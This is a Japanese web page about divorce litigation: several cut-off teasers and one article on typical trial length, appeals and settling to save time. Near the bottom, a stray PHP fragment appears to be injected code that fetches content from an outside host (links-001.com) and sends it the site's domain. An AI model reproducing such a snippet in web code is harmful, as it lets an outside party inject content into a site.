前へ
次へ

離婚裁判の流れを知る弁護士に相談する

離婚をするにあたって離婚裁判をすることになったら実際に裁判所に行く必要があります。刑事裁判と異なるの

more

有利にする離婚裁判とは

離婚の合意が上手くいかない場合には、離婚裁判をおこなう必要がありますが、さまざまな事情を考慮して財産

more

離婚裁判などの裁判が公開されるのは基本的だ

離婚裁判が行われる場合があると思われますが、それを含めて裁判は公開されるというのが基本的であると言わ

more

離婚裁判にかかる期間はどれくらいか

離婚裁判にかかる期間はケースバイケースですので一概に言えませんが、平均するとおおむね1〜2年といったところでしょう。訴状を出してから第1回目の口頭弁論が実施されるまでに1か月から1か月半ほどかかり、その後は月に1回ほど審理がおこなわれるのが通常のペースです。ただし、なんらか複雑な事情があればもっと長くかかりますし、証拠の提示が不十分な場合には更なる証拠を集めるためにさらに審理が長引きます。被告側が上告して最高裁まで争うなら、どんなに短くても3年はかかるでしょう。離婚協議をはじめてから数々の段階を踏んで訴訟となりますので、そこから3年となると、 離婚を決めたときから成立するまで全体の期間としては、4年以上になるケースも有り得るわけです。そこまで長引かせたくないと考えるなら、審理途中であっても譲歩できる可能性を探り、和解を検討するのがおすすめです。和解すれば期間を短くすることができますし、場合によっては1年かからずに成立させることも可能でしょう。毎日ずっと離婚問題を抱え続けたまま生活するのは心労やストレスになりますし、何より費用がかかるためできるだけ避けたいのは当然です。譲れない部分で離婚裁判に発展してしまうことは避けられないとしても、早期終了させるには、第一審で終わらせるつもりで臨むのが一番です。まず、離婚事由を証明する決定的な証拠をあらかじめ揃えておくことが大切です。また裁判官が和解提案を出して来た場合、内容が妥当であれば提案を受け入れる姿勢も必要です。往々にして言えるのは、請求するものが多いと期間が長期化するということです。一方が離婚したいのに相手が別れたくないという場合は離婚事由の正当性だけが争点となりますが、ほとんどの場合はそれに加えて金銭的な要求が発生します。慰謝料であったり、財産分与であったり、養育費であったりとさまざまですが、求めるものが多ければ多いほど期間が延長されることは覚悟しましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top